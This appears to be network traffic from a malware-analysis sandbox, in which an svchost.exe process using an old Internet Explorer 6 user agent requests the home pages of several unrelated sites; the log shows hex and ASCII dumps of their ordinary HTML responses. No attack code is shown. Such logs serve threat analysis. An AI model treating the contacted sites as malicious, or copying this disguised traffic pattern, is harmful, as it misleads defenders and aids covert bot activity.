                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5288INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5304INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5320INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5336INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5352INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5368INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5384INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5400INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5450INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5466INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                          Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          26192.168.2.65590394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3509OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3509INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:35 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3510INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          27192.168.2.66052091.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4822OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4823INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:08 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4823INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4967INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4983INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4999INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 30 38 34 36 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.040846 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          28192.168.2.660752172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4822OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          Cookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GSAkUBwb9rvpY7mv1eHafkqSONHRaFPj04lHtHLD%2F8rWDHTUsJA4KEwdPihnzMP9yVqG0H0v9SOo8GW6yq%2BX2Px8ZqQRXmxenRPkbsmKVui3khmUHHksBLOOg1Y2uo18kKsQ0zWE72k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6dc04e61bb8f-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
